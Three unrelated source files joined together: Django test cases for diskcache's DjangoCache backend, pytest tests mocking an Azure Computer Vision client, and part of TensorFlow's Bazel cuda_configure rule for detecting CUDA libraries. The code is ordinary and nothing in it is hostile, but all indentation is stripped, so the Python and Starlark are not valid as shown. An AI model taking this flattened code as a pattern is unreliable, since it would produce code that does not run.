def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='diskcache.DjangoCache',
))
class DiskCacheTests(BaseCacheTests, TestCase):
"Specific test cases for diskcache.DjangoCache."
def setUp(self):
super(DiskCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Cache location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(DiskCacheTests, self).tearDown()
cache.close()
shutil.rmtree(self.dirname, ignore_errors=True)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_cache_write_unpicklable_type(self):
# This fails if not using the highest pickling protocol on Python 2.
cache.set('unpicklable', UnpicklableType())
def test_cull(self):
cache.cull()
def test_zero_cull(self):
pass # DiskCache has its own cull strategy.
def test_invalid_key_characters(self):
pass # DiskCache supports any Pickle-able value as a cache key.
def test_invalid_key_length(self):
pass # DiskCache supports any Pickle-able value as a cache key.
def test_directory(self):
self.assertTrue('tmp' in cache.directory)
def test_read(self):
value = b'abcd' * 2 ** 20
result = cache.set(b'test-key', value)
self.assertTrue(result)
with cache.read(b'test-key') as reader:
self.assertEqual(reader.read(), value)
try:
with cache.read(b'dne') as reader:
error = False
except KeyError:
error = True
self.assertTrue(error)
def test_expire(self):
cache.clear()
cache.set(b'expire-key', 0, timeout=0.05)
time.sleep(0.1)
self.assertEqual(cache.expire(), 1)
self.assertEqual(cache.get(b'expire-key'), None)
def test_evict(self):
cache.clear()
for num in range(100):
cache.set(num, num, tag=(num % 4))
self.assertEqual(cache.evict(1), 25)
cache.create_tag_index()
self.assertEqual(cache.evict(2), 25)
cache.drop_tag_index()
self.assertEqual(cache.evict(3), 25)
for num in range(0, 100, 4):
self.assertEqual(cache.get(num), num)
def test_pop(self):
cache.clear()
for num in range(5):
cache.set(num, num, timeout=None)
self.assertEqual(cache.pop(0), 0)
self.assertEqual(cache.pop(0), None)
self.assertEqual(cache.pop(0, 1), 1)
self.assertEqual(cache.pop(0, default=1), 1)
self.assertEqual(cache.pop(1, expire_time=True), (1, None))
self.assertEqual(cache.pop(2, tag=True), (2, None))
self.assertEqual(cache.pop(3, expire_time=True, tag=True), (3, None, None))
self.assertEqual(cache.pop(4, retry=False), 4)
def test_pickle(self):
letters = 'abcde'
cache.clear()
for num, val in enumerate(letters):
cache.set(val, num)
data = pickle.dumps(cache)
other = pickle.loads(data)
for key in letters:
self.assertEqual(other.get(key), cache.get(key))
def test_cache(self):
subcache = cache.cache('test')
directory = os.path.join(cache.directory, 'cache', 'test')
self.assertEqual(subcache.directory, directory)
def test_deque(self):
deque = cache.deque('test')
directory = os.path.join(cache.directory, 'deque', 'test')
self.assertEqual(deque.directory, directory)
def test_index(self):
index = cache.index('test')
directory = os.path.join(cache.directory, 'index', 'test')
self.assertEqual(index.directory, directory)
def test_memoize(self):
with self.assertRaises(TypeError):
@cache.memoize # <-- Missing parens!
def test():
pass
count = 1000
def fibiter(num):
alpha, beta = 0, 1
for _ in range(num):
alpha, beta = beta, alpha + beta
return alpha
@cache.memoize()
def fibrec(num):
if num == 0:
return 0
elif num == 1:
return 1
else:
return fibrec(num - 1) + fibrec(num - 2)
cache.stats(enable=True)
for value in range(count):
self.assertEqual(fibrec(value), fibiter(value))
hits1, misses1 = cache.stats()
for value in range(count):
self.assertEqual(fibrec(value), fibiter(value))
hits2, misses2 = cache.stats()
self.assertEqual(hits2, hits1 + count)
self.assertEqual(misses2, misses1)
|
import pytest
import os
import logging
import requests_helper
@pytest.fixture
def valid_post_image():
return open('_test/src/img001.jpg', 'rb')
@pytest.fixture
def valid_post_url():
return os.environ['COMPUTER_VISION_ENDPOINT'] + "/vision/v3.0/read/analyze"
@pytest.fixture
def valid_headers():
return {
'Ocp-Apim-Subscription-Key': os.environ['COMPUTER_VISION_KEY'],
'Content-Type': 'application/octet-stream'
}
@pytest.fixture
def valid_get_url():
return "operation-location"
class MockResponse:
def __init__(self, json_data, status_code, headers):
self.json_data = json_data
self.status_code = status_code
self.headers = headers
def json(self):
return self.json_data
def test_post_response_is_ok(mocker, valid_post_url, valid_headers, valid_post_image):
mock_post = mocker.patch('requests_helper.requests.post')
mock_post.return_value = MockResponse(None, 202, { "Operation-Location": "a-valid-url" })
response = requests_helper.post_image(valid_post_url, valid_headers, valid_post_image)
    assert response.headers["Operation-Location"] == "a-valid-url"
def test_post_response_handles_500_error(mocker, valid_post_url, valid_headers, valid_post_image):
mock_post = mocker.patch('requests_helper.requests.post')
mock_post.return_value = MockResponse({"error": {"code": "FailedToProcess", "message": "The analyze request could not be started due to a cluster-related issue. Please resubmit the document for processing."}}, 500, {})
response = requests_helper.post_image(valid_post_url, valid_headers, valid_post_image)
assert response == { "status_code": 500, "code": "FailedToProcess", "message": "The analyze request could not be started due to a cluster-related issue. Please resubmit the document for processing."}
def test_get_read_result_is_ok(mocker, valid_headers, valid_get_url):
mock_get = mocker.patch('requests_helper.requests.get')
mock_get.return_value = MockResponse( {"analyzeResult": { "lines": [{"text": "this is text"}]}}, 200, {})
response = requests_helper.get_read_result(valid_get_url, valid_headers)
assert response.json()["analyzeResult"] is not None
def test_get_read_result_handles_error(mocker, valid_headers, valid_get_url):
mock_get = mocker.patch('requests_helper.requests.get')
mock_get.return_value = MockResponse({"error": { "code": "fail", "message": "because"}}, 500, {})
response = requests_helper.get_read_result(valid_get_url, valid_headers)
assert response["code"] == "fail"
|
"""Repository rule for CUDA autoconfiguration.
`cuda_configure` depends on the following environment variables:
* `TF_NEED_CUDA`: Whether to enable building with CUDA.
* `GCC_HOST_COMPILER_PATH`: The GCC host compiler path
* `TF_CUDA_CLANG`: Whether to use clang as a cuda compiler.
* `CLANG_CUDA_COMPILER_PATH`: The clang compiler path that will be used for
both host and device code compilation if TF_CUDA_CLANG is 1.
* `TF_SYSROOT`: The sysroot to use when compiling.
* `TF_DOWNLOAD_CLANG`: Whether to download a recent release of clang
compiler and use it to build tensorflow. When this option is set
CLANG_CUDA_COMPILER_PATH is ignored.
* `TF_CUDA_PATHS`: The base paths to look for CUDA and cuDNN. Default is
`/usr/local/cuda,usr/`.
* `CUDA_TOOLKIT_PATH` (deprecated): The path to the CUDA toolkit. Default is
`/usr/local/cuda`.
* `TF_CUDA_VERSION`: The version of the CUDA toolkit. If this is blank, then
use the system default.
* `TF_CUDNN_VERSION`: The version of the cuDNN library.
* `CUDNN_INSTALL_PATH` (deprecated): The path to the cuDNN library. Default is
`/usr/local/cuda`.
* `TF_CUDA_COMPUTE_CAPABILITIES`: The CUDA compute capabilities. Default is
  `compute_35,compute_52`.
* `PYTHON_BIN_PATH`: The python binary path
"""
load("//third_party/clang_toolchain:download_clang.bzl", "download_clang")
load(
"@bazel_tools//tools/cpp:lib_cc_configure.bzl",
"escape_string",
"get_env_var",
)
load(
"@bazel_tools//tools/cpp:windows_cc_configure.bzl",
"find_msvc_tool",
"find_vc_path",
"setup_vc_env_vars",
)
load(
"//third_party/remote_config:common.bzl",
"config_repo_label",
"err_out",
"execute",
"get_bash_bin",
"get_cpu_value",
"get_host_environ",
"get_python_bin",
"is_windows",
"raw_exec",
"read_dir",
"realpath",
"which",
)
_GCC_HOST_COMPILER_PATH = "GCC_HOST_COMPILER_PATH"
_GCC_HOST_COMPILER_PREFIX = "GCC_HOST_COMPILER_PREFIX"
_CLANG_CUDA_COMPILER_PATH = "CLANG_CUDA_COMPILER_PATH"
_TF_SYSROOT = "TF_SYSROOT"
_CUDA_TOOLKIT_PATH = "CUDA_TOOLKIT_PATH"
_TF_CUDA_VERSION = "TF_CUDA_VERSION"
_TF_CUDNN_VERSION = "TF_CUDNN_VERSION"
_CUDNN_INSTALL_PATH = "CUDNN_INSTALL_PATH"
_TF_CUDA_COMPUTE_CAPABILITIES = "TF_CUDA_COMPUTE_CAPABILITIES"
_TF_CUDA_CONFIG_REPO = "TF_CUDA_CONFIG_REPO"
_TF_DOWNLOAD_CLANG = "TF_DOWNLOAD_CLANG"
_PYTHON_BIN_PATH = "PYTHON_BIN_PATH"
def to_list_of_strings(elements):
"""Convert the list of ["a", "b", "c"] into '"a", "b", "c"'.
This is to be used to put a list of strings into the bzl file templates
so it gets interpreted as list of strings in Starlark.
Args:
elements: list of string elements
Returns:
single string of elements wrapped in quotes separated by a comma."""
quoted_strings = ["\"" + element + "\"" for element in elements]
return ", ".join(quoted_strings)
def verify_build_defines(params):
"""Verify all variables that crosstool/BUILD.tpl expects are substituted.
Args:
params: dict of variables that will be passed to the BUILD.tpl template.
"""
missing = []
for param in [
"cxx_builtin_include_directories",
"extra_no_canonical_prefixes_flags",
"host_compiler_path",
"host_compiler_prefix",
"host_compiler_warnings",
"linker_bin_path",
"compiler_deps",
"msvc_cl_path",
"msvc_env_include",
"msvc_env_lib",
"msvc_env_path",
"msvc_env_tmp",
"msvc_lib_path",
"msvc_link_path",
"msvc_ml_path",
"unfiltered_compile_flags",
"win_compiler_deps",
]:
if ("%{" + param + "}") not in params:
missing.append(param)
if missing:
auto_configure_fail(
"BUILD.tpl template is missing these variables: " +
str(missing) +
".\nWe only got: " +
str(params) +
".",
)
def _get_nvcc_tmp_dir_for_windows(repository_ctx):
"""Return the Windows tmp directory for nvcc to generate intermediate source files."""
escaped_tmp_dir = escape_string(
get_env_var(repository_ctx, "TMP", "C:\\Windows\\Temp").replace(
"\\",
"\\\\",
),
)
return escaped_tmp_dir + "\\\\nvcc_inter_files_tmp_dir"
def _get_msvc_compiler(repository_ctx):
vc_path = find_vc_path(repository_ctx)
return find_msvc_tool(repository_ctx, vc_path, "cl.exe").replace("\\", "/")
def _get_win_cuda_defines(repository_ctx):
"""Return CROSSTOOL defines for Windows"""
    # If we are not on Windows, return fake values for Windows specific fields.
# This ensures the CROSSTOOL file parser is happy.
if not is_windows(repository_ctx):
return {
"%{msvc_env_tmp}": "msvc_not_used",
"%{msvc_env_path}": "msvc_not_used",
"%{msvc_env_include}": "msvc_not_used",
"%{msvc_env_lib}": "msvc_not_used",
"%{msvc_cl_path}": "msvc_not_used",
"%{msvc_ml_path}": "msvc_not_used",
"%{msvc_link_path}": "msvc_not_used",
"%{msvc_lib_path}": "msvc_not_used",
}
vc_path = find_vc_path(repository_ctx)
if not vc_path:
auto_configure_fail(
"Visual C++ build tools not found on your machine." +
"Please check your installation following https://docs.bazel.build/versions/master/windows.html#using",
)
return {}
env = setup_vc_env_vars(repository_ctx, vc_path)
escaped_paths = escape_string(env["PATH"])
escaped_include_paths = escape_string(env["INCLUDE"])
escaped_lib_paths = escape_string(env["LIB"])
escaped_tmp_dir = escape_string(
get_env_var(repository_ctx, "TMP", "C:\\Windows\\Temp").replace(
"\\",
"\\\\",
),
)
msvc_cl_path = get_python_bin(repository_ctx)
msvc_ml_path = find_msvc_tool(repository_ctx, vc_path, "ml64.exe").replace(
"\\",
"/",
)
msvc_link_path = find_msvc_tool(repository_ctx, vc_path, "link.exe").replace(
"\\",
"/",
)
msvc_lib_path = find_msvc_tool(repository_ctx, vc_path, "lib.exe").replace(
"\\",
"/",
)
# nvcc will generate some temporary source files under %{nvcc_tmp_dir}
    # The generated files are guaranteed to have unique names, so they can share
# the same tmp directory
escaped_cxx_include_directories = [
_get_nvcc_tmp_dir_for_windows(repository_ctx),
"C:\\\\botcode\\\\w",
]
for path in escaped_include_paths.split(";"):
if path:
escaped_cxx_include_directories.append(path)
return {
"%{msvc_env_tmp}": escaped_tmp_dir,
"%{msvc_env_path}": escaped_paths,
"%{msvc_env_include}": escaped_include_paths,
"%{msvc_env_lib}": escaped_lib_paths,
"%{msvc_cl_path}": msvc_cl_path,
"%{msvc_ml_path}": msvc_ml_path,
"%{msvc_link_path}": msvc_link_path,
"%{msvc_lib_path}": msvc_lib_path,
"%{cxx_builtin_include_directories}": to_list_of_strings(
escaped_cxx_include_directories,
),
}
# TODO(dzc): Once these functions have been factored out of Bazel's
# cc_configure.bzl, load them from @bazel_tools instead.
# BEGIN cc_configure common functions.
def find_cc(repository_ctx):
"""Find the C++ compiler."""
if is_windows(repository_ctx):
return _get_msvc_compiler(repository_ctx)
if _use_cuda_clang(repository_ctx):
target_cc_name = "clang"
cc_path_envvar = _CLANG_CUDA_COMPILER_PATH
if _flag_enabled(repository_ctx, _TF_DOWNLOAD_CLANG):
return "extra_tools/bin/clang"
else:
target_cc_name = "gcc"
cc_path_envvar = _GCC_HOST_COMPILER_PATH
cc_name = target_cc_name
cc_name_from_env = get_host_environ(repository_ctx, cc_path_envvar)
if cc_name_from_env:
cc_name = cc_name_from_env
if cc_name.startswith("/"):
# Absolute path, maybe we should make this supported by our which function.
return cc_name
cc = which(repository_ctx, cc_name)
if cc == None:
fail(("Cannot find {}, either correct your path or set the {}" +
" environment variable").format(target_cc_name, cc_path_envvar))
return cc
_INC_DIR_MARKER_BEGIN = "#include <...>"
# OSX add " (framework directory)" at the end of line, strip it.
_OSX_FRAMEWORK_SUFFIX = " (framework directory)"
_OSX_FRAMEWORK_SUFFIX_LEN = len(_OSX_FRAMEWORK_SUFFIX)
def _cxx_inc_convert(path):
"""Convert path returned by cc -E xc++ in a complete path."""
path = path.strip()
if path.endswith(_OSX_FRAMEWORK_SUFFIX):
path = path[:-_OSX_FRAMEWORK_SUFFIX_LEN].strip()
return path
def _normalize_include_path(repository_ctx, path):
"""Normalizes include paths before writing them to the crosstool.
If path points inside the 'crosstool' folder of the repository, a relative
path is returned.
If path points outside the 'crosstool' folder, an absolute path is returned.
"""
path = str(repository_ctx.path(path))
crosstool_folder = str(repository_ctx.path(".").get_child("crosstool"))
if path.startswith(crosstool_folder):
# We drop the path to "$REPO/crosstool" and a trailing path separator.
return path[len(crosstool_folder) + 1:]
return path
def _get_cxx_inc_directories_impl(repository_ctx, cc, lang_is_cpp, tf_sysroot):
"""Compute the list of default C or C++ include directories."""
if lang_is_cpp:
lang = "c++"
else:
lang = "c"
sysroot = []
if tf_sysroot:
sysroot += ["--sysroot", tf_sysroot]
result = raw_exec(repository_ctx, [cc, "-E", "-x" + lang, "-", "-v"] +
sysroot)
stderr = err_out(result)
index1 = stderr.find(_INC_DIR_MARKER_BEGIN)
if index1 == -1:
return []
index1 = stderr.find("\n", index1)
if index1 == -1:
return []
index2 = stderr.rfind("\n ")
if index2 == -1 or index2 < index1:
return []
index2 = stderr.find("\n", index2 + 1)
if index2 == -1:
inc_dirs = stderr[index1 + 1:]
else:
inc_dirs = stderr[index1 + 1:index2].strip()
return [
_normalize_include_path(repository_ctx, _cxx_inc_convert(p))
for p in inc_dirs.split("\n")
]
def get_cxx_inc_directories(repository_ctx, cc, tf_sysroot):
"""Compute the list of default C and C++ include directories."""
# For some reason `clang -xc` sometimes returns include paths that are
# different from the ones from `clang -xc++`. (Symlink and a dir)
# So we run the compiler with both `-xc` and `-xc++` and merge resulting lists
includes_cpp = _get_cxx_inc_directories_impl(
repository_ctx,
cc,
True,
tf_sysroot,
)
includes_c = _get_cxx_inc_directories_impl(
repository_ctx,
cc,
False,
tf_sysroot,
)
return includes_cpp + [
inc
for inc in includes_c
if inc not in includes_cpp
]
def auto_configure_fail(msg):
"""Output failure message when cuda configuration fails."""
red = "\033[0;31m"
no_color = "\033[0m"
fail("\n%sCuda Configuration Error:%s %s\n" % (red, no_color, msg))
# END cc_configure common functions (see TODO above).
def _cuda_include_path(repository_ctx, cuda_config):
"""Generates the Starlark string with cuda include directories.
Args:
repository_ctx: The repository context.
cc: The path to the gcc host compiler.
Returns:
A list of the gcc host compiler include directories.
"""
nvcc_path = repository_ctx.path("%s/bin/nvcc%s" % (
cuda_config.cuda_toolkit_path,
".exe" if cuda_config.cpu_value == "Windows" else "",
))
# The expected exit code of this command is non-zero. Bazel remote execution
# only caches commands with zero exit code. So force a zero exit code.
cmd = "%s -v /dev/null -o /dev/null ; [ $? -eq 1 ]" % str(nvcc_path)
result = raw_exec(repository_ctx, [get_bash_bin(repository_ctx), "-c", cmd])
target_dir = ""
for one_line in err_out(result).splitlines():
if one_line.startswith("#$ _TARGET_DIR_="):
target_dir = (
cuda_config.cuda_toolkit_path + "/" + one_line.replace(
"#$ _TARGET_DIR_=",
"",
) + "/include"
)
inc_entries = []
if target_dir != "":
inc_entries.append(realpath(repository_ctx, target_dir))
inc_entries.append(realpath(repository_ctx, cuda_config.cuda_toolkit_path + "/include"))
return inc_entries
def enable_cuda(repository_ctx):
"""Returns whether to build with CUDA support."""
return int(get_host_environ(repository_ctx, "TF_NEED_CUDA", False))
def matches_version(environ_version, detected_version):
"""Checks whether the user-specified version matches the detected version.
    This function performs a weak matching so that if the user specifies only
    the major, or the major and minor versions, the versions are still
    considered matching if the version parts match. To illustrate:
environ_version detected_version result
-----------------------------------------
5.1.3 5.1.3 True
5.1 5.1.3 True
5 5.1 True
5.1.3 5.1 False
5.2.3 5.1.3 False
Args:
environ_version: The version specified by the user via environment
variables.
detected_version: The version autodetected from the CUDA installation on
the system.
Returns: True if user-specified version matches detected version and False
otherwise.
"""
environ_version_parts = environ_version.split(".")
detected_version_parts = detected_version.split(".")
if len(detected_version_parts) < len(environ_version_parts):
return False
for i, part in enumerate(detected_version_parts):
if i >= len(environ_version_parts):
break
if part != environ_version_parts[i]:
return False
return True
_NVCC_VERSION_PREFIX = "Cuda compilation tools, release "
_DEFINE_CUDNN_MAJOR = "#define CUDNN_MAJOR"
def compute_capabilities(repository_ctx):
"""Returns a list of strings representing cuda compute capabilities.
Args:
repository_ctx: the repo rule's context.
Returns: list of cuda architectures to compile for. 'compute_xy' refers to
both PTX and SASS, 'sm_xy' refers to SASS only.
"""
capabilities = get_host_environ(
repository_ctx,
_TF_CUDA_COMPUTE_CAPABILITIES,
"compute_35,compute_52",
).split(",")
# Map old 'x.y' capabilities to 'compute_xy'.
for i, capability in enumerate(capabilities):
parts = capability.split(".")
if len(parts) != 2:
continue
capabilities[i] = "compute_%s%s" % (parts[0], parts[1])
# Make list unique
capabilities = dict(zip(capabilities, capabilities)).keys()
# Validate capabilities.
for capability in capabilities:
if not capability.startswith(("compute_", "sm_")):
auto_configure_fail("Invalid compute capability: %s" % capability)
for prefix in ["compute_", "sm_"]:
if not capability.startswith(prefix):
continue
if len(capability) == len(prefix) + 2 and capability[-2:].isdigit():
continue
auto_configure_fail("Invalid compute capability: %s" % capability)
return capabilities
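# Illustrative example (assumed input): with TF_CUDA_COMPUTE_CAPABILITIES set to
# "7.0,sm_75,compute_80", compute_capabilities() yields
# ["compute_70", "sm_75", "compute_80"] - legacy 'x.y' entries are rewritten to
# 'compute_xy', while explicit 'compute_xy'/'sm_xy' entries are kept as-is.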
def lib_name(base_name, cpu_value, version = None, static = False):
"""Constructs the platform-specific name of a library.
Args:
base_name: The name of the library, such as "cudart"
cpu_value: The name of the host operating system.
version: The version of the library.
      static: True if the library is static, or False if it is a shared object.
Returns:
The platform-specific name of the library.
"""
version = "" if not version else "." + version
if cpu_value in ("Linux", "FreeBSD"):
if static:
return "lib%s.a" % base_name
return "lib%s.so%s" % (base_name, version)
elif cpu_value == "Windows":
return "%s.lib" % base_name
elif cpu_value == "Darwin":
if static:
return "lib%s.a" % base_name
return "lib%s%s.dylib" % (base_name, version)
else:
auto_configure_fail("Invalid cpu_value: %s" % cpu_value)
def _lib_path(lib, cpu_value, basedir, version, static):
file_name = lib_name(lib, cpu_value, version, static)
return "%s/%s" % (basedir, file_name)
def _should_check_soname(version, static):
return version and not static
def _check_cuda_lib_params(lib, cpu_value, basedir, version, static = False):
return (
_lib_path(lib, cpu_value, basedir, version, static),
_should_check_soname(version, static),
)
def _check_cuda_libs(repository_ctx, script_path, libs):
python_bin = get_python_bin(repository_ctx)
contents = repository_ctx.read(script_path).splitlines()
cmd = "from os import linesep;"
cmd += "f = open('script.py', 'w');"
for line in contents:
cmd += "f.write('%s' + linesep);" % line
cmd += "f.close();"
cmd += "from os import system;"
args = " ".join(["\"" + path + "\" " + str(check) for path, check in libs])
cmd += "system('%s script.py %s');" % (python_bin, args)
all_paths = [path for path, _ in libs]
checked_paths = execute(repository_ctx, [python_bin, "-c", cmd]).stdout.splitlines()
# Filter out empty lines from splitting on '\r\n' on Windows
checked_paths = [path for path in checked_paths if len(path) > 0]
if all_paths != checked_paths:
auto_configure_fail("Error with installed CUDA libs. Expected '%s'. Actual '%s'." % (all_paths, checked_paths))
def _find_libs(repository_ctx, check_cuda_libs_script, cuda_config):
"""Returns the CUDA and cuDNN libraries on the system.
    Also verifies that the libraries actually exist on the system.
Args:
repository_ctx: The repository context.
check_cuda_libs_script: The path to a script verifying that the cuda
libraries exist on the system.
cuda_config: The CUDA config as returned by _get_cuda_config
Returns:
      Map of library names to their paths on the system.
"""
cpu_value = cuda_config.cpu_value
stub_dir = "" if is_windows(repository_ctx) else "/stubs"
check_cuda_libs_params = {
"cuda": _check_cuda_lib_params(
"cuda",
cpu_value,
cuda_config.config["cuda_library_dir"] + stub_dir,
version = None,
static = False,
),
"cudart": _check_cuda_lib_params(
"cudart",
cpu_value,
cuda_config.config["cuda_library_dir"],
cuda_config.cuda_version,
static = False,
),
"cudart_static": _check_cuda_lib_params(
"cudart_static",
cpu_value,
cuda_config.config["cuda_library_dir"],
cuda_config.cuda_version,
static = True,
),
"cublas": _check_cuda_lib_params(
"cublas",
cpu_value,
cuda_config.config["cublas_library_dir"],
cuda_config.cublas_version,
static = False,
),
"cusolver": _check_cuda_lib_params(
"cusolver",
cpu_value,
cuda_config.config["cusolver_library_dir"],
cuda_config.cusolver_version,
static = False,
),
"curand": _check_cuda_lib_params(
"curand",
cpu_value,
cuda_config.config["curand_library_dir"],
cuda_config.curand_version,
static = False,
),
"cufft": _check_cuda_lib_params(
"cufft",
cpu_value,
cuda_config.config["cufft_library_dir"],
cuda_config.cufft_version,
static = False,
),
"cudnn": _check_cuda_lib_params(
"cudnn",
cpu_value,
cuda_config.config["cudnn_library_dir"],
cuda_config.cudnn_version,
static = False,
),
"cupti": _check_cuda_lib_params(
"cupti",
cpu_value,
cuda_config.config["cupti_library_dir"],
cuda_config.cuda_version,
static = False,
),
"cusparse": _check_cuda_lib_params(
"cusparse",
cpu_value,
cuda_config.config["cusparse_library_dir"],
cuda_config.cusparse_version,
static = False,
),
}
# Verify that the libs actually exist at their locations.
_check_cuda_libs(repository_ctx, check_cuda_libs_script, check_cuda_libs_params.values())
paths = {filename: v[0] for (filename, v) in check_cuda_libs_params.items()}
return paths
def _cudart_static_linkopt(cpu_value):
"""Returns additional platform-specific linkopts for cudart."""
return "" if cpu_value == "Darwin" else "\"-lrt\","
def _exec_find_cuda_config(repository_ctx, script_path, cuda_libraries):
python_bin = get_python_bin(repository_ctx)
# If used with remote execution then repository_ctx.execute() can't
# access files from the source tree. A trick is to read the contents
# of the file in Starlark and embed them as part of the command. In
# this case the trick is not sufficient as the find_cuda_config.py
# script has more than 8192 characters. 8192 is the command length
# limit of cmd.exe on Windows. Thus we additionally need to compress
# the contents locally and decompress them as part of the execute().
compressed_contents = repository_ctx.read(script_path)
decompress_and_execute_cmd = (
"from zlib import decompress;" +
"from base64 import b64decode;" +
"from os import system;" +
"script = decompress(b64decode('%s'));" % compressed_contents +
"f = open('script.py', 'wb');" +
"f.write(script);" +
"f.close();" +
"system('\"%s\" script.py %s');" % (python_bin, " ".join(cuda_libraries))
)
return execute(repository_ctx, [python_bin, "-c", decompress_and_execute_cmd])
# TODO(csigg): Only call once instead of from here, tensorrt_configure.bzl,
# and nccl_configure.bzl.
def find_cuda_config(repository_ctx, script_path, cuda_libraries):
"""Returns CUDA config dictionary from running find_cuda_config.py"""
exec_result = _exec_find_cuda_config(repository_ctx, script_path, cuda_libraries)
if exec_result.return_code:
auto_configure_fail("Failed to run find_cuda_config.py: %s" % err_out(exec_result))
# Parse the dict from stdout.
return dict([tuple(x.split(": ")) for x in exec_result.stdout.splitlines()])
def _get_cuda_config(repository_ctx, find_cuda_config_script):
"""Detects and returns information about the CUDA installation on the system.
Args:
      repository_ctx: The repository context.
      find_cuda_config_script: The path to the compressed find_cuda_config.py script.
    Returns:
      A struct containing the following fields:
        cuda_toolkit_path: The CUDA toolkit installation directory.
        cuda_version: The version of CUDA on the system.
        cublas_version, cusolver_version, curand_version, cufft_version,
          cusparse_version: The versions of the corresponding CUDA libraries.
        cudnn_version: The version of cuDNN on the system.
        compute_capabilities: A list of the system's CUDA compute capabilities.
        cpu_value: The name of the host operating system.
        config: The raw configuration dictionary from find_cuda_config.py.
    """
config = find_cuda_config(repository_ctx, find_cuda_config_script, ["cuda", "cudnn"])
cpu_value = get_cpu_value(repository_ctx)
toolkit_path = config["cuda_toolkit_path"]
is_windows = cpu_value == "Windows"
cuda_version = config["cuda_version"].split(".")
cuda_major = cuda_version[0]
cuda_minor = cuda_version[1]
cuda_version = ("64_%s%s" if is_windows else "%s.%s") % (cuda_major, cuda_minor)
cudnn_version = ("64_%s" if is_windows else "%s") % config["cudnn_version"]
if int(cuda_major) >= 11:
cublas_version = ("64_%s" if is_windows else "%s") % config["cublas_version"].split(".")[0]
cusolver_version = ("64_%s" if is_windows else "%s") % config["cusolver_version"].split(".")[0]
curand_version = ("64_%s" if is_windows else "%s") % config["curand_version"].split(".")[0]
cufft_version = ("64_%s" if is_windows else "%s") % config["cufft_version"].split(".")[0]
cusparse_version = ("64_%s" if is_windows else "%s") % config["cusparse_version"].split(".")[0]
elif (int(cuda_major), int(cuda_minor)) >= (10, 1):
# cuda_lib_version is for libraries like cuBLAS, cuFFT, cuSOLVER, etc.
# It changed from 'x.y' to just 'x' in CUDA 10.1.
cuda_lib_version = ("64_%s" if is_windows else "%s") % cuda_major
cublas_version = cuda_lib_version
cusolver_version = cuda_lib_version
curand_version = cuda_lib_version
cufft_version = cuda_lib_version
cusparse_version = cuda_lib_version
else:
cublas_version = cuda_version
cusolver_version = cuda_version
curand_version = cuda_version
cufft_version = cuda_version
cusparse_version = cuda_version
return struct(
cuda_toolkit_path = toolkit_path,
cuda_version = cuda_version,
cublas_version = cublas_version,
cusolver_version = cusolver_version,
curand_version = curand_version,
cufft_version = cufft_version,
cusparse_version = cusparse_version,
cudnn_version = cudnn_version,
compute_capabilities = compute_capabilities(repository_ctx),
cpu_value = cpu_value,
config = config,
)
def _tpl(repository_ctx, tpl, substitutions = {}, out = None):
if not out:
out = tpl.replace(":", "/")
repository_ctx.template(
out,
Label("//third_party/gpus/%s.tpl" % tpl),
substitutions,
)
def _file(repository_ctx, label):
repository_ctx.template(
label.replace(":", "/"),
Label("//third_party/gpus/%s.tpl" % label),
{},
)
_DUMMY_CROSSTOOL_BZL_FILE = """
def error_gpu_disabled():
fail("ERROR: Building with --config=cuda but TensorFlow is not configured " +
"to build with GPU support. Please re-run ./configure and enter 'Y' " +
"at the prompt to build with GPU support.")
native.genrule(
name = "error_gen_crosstool",
outs = ["CROSSTOOL"],
cmd = "echo 'Should not be run.' && exit 1",
)
native.filegroup(
name = "crosstool",
srcs = [":CROSSTOOL"],
output_licenses = ["unencumbered"],
)
"""
_DUMMY_CROSSTOOL_BUILD_FILE = """
load("//crosstool:error_gpu_disabled.bzl", "error_gpu_disabled")
error_gpu_disabled()
"""
def _create_dummy_repository(repository_ctx):
cpu_value = get_cpu_value(repository_ctx)
# Set up BUILD file for cuda/.
_tpl(
repository_ctx,
"cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "False",
"%{cuda_extra_copts}": "[]",
"%{cuda_gpu_architectures}": "[]",
},
)
_tpl(
repository_ctx,
"cuda:BUILD",
{
"%{cuda_driver_lib}": lib_name("cuda", cpu_value),
"%{cudart_static_lib}": lib_name(
"cudart_static",
cpu_value,
static = True,
),
"%{cudart_static_linkopt}": _cudart_static_linkopt(cpu_value),
"%{cudart_lib}": lib_name("cudart", cpu_value),
"%{cublas_lib}": lib_name("cublas", cpu_value),
"%{cusolver_lib}": lib_name("cusolver", cpu_value),
"%{cudnn_lib}": lib_name("cudnn", cpu_value),
"%{cufft_lib}": lib_name("cufft", cpu_value),
"%{curand_lib}": lib_name("curand", cpu_value),
"%{cupti_lib}": lib_name("cupti", cpu_value),
"%{cusparse_lib}": lib_name("cusparse", cpu_value),
"%{copy_rules}": """
filegroup(name="cuda-include")
filegroup(name="cublas-include")
filegroup(name="cusolver-include")
filegroup(name="cufft-include")
filegroup(name="cusparse-include")
filegroup(name="curand-include")
filegroup(name="cudnn-include")
""",
},
)
# Create dummy files for the CUDA toolkit since they are still required by
# tensorflow/core/platform/default/build_config:cuda.
repository_ctx.file("cuda/cuda/include/cuda.h")
repository_ctx.file("cuda/cuda/include/cublas.h")
repository_ctx.file("cuda/cuda/include/cudnn.h")
repository_ctx.file("cuda/cuda/extras/CUPTI/include/cupti.h")
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cuda", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cudart", cpu_value))
repository_ctx.file(
"cuda/cuda/lib/%s" % lib_name("cudart_static", cpu_value),
)
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cublas", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cusolver", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cudnn", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("curand", cpu_value))
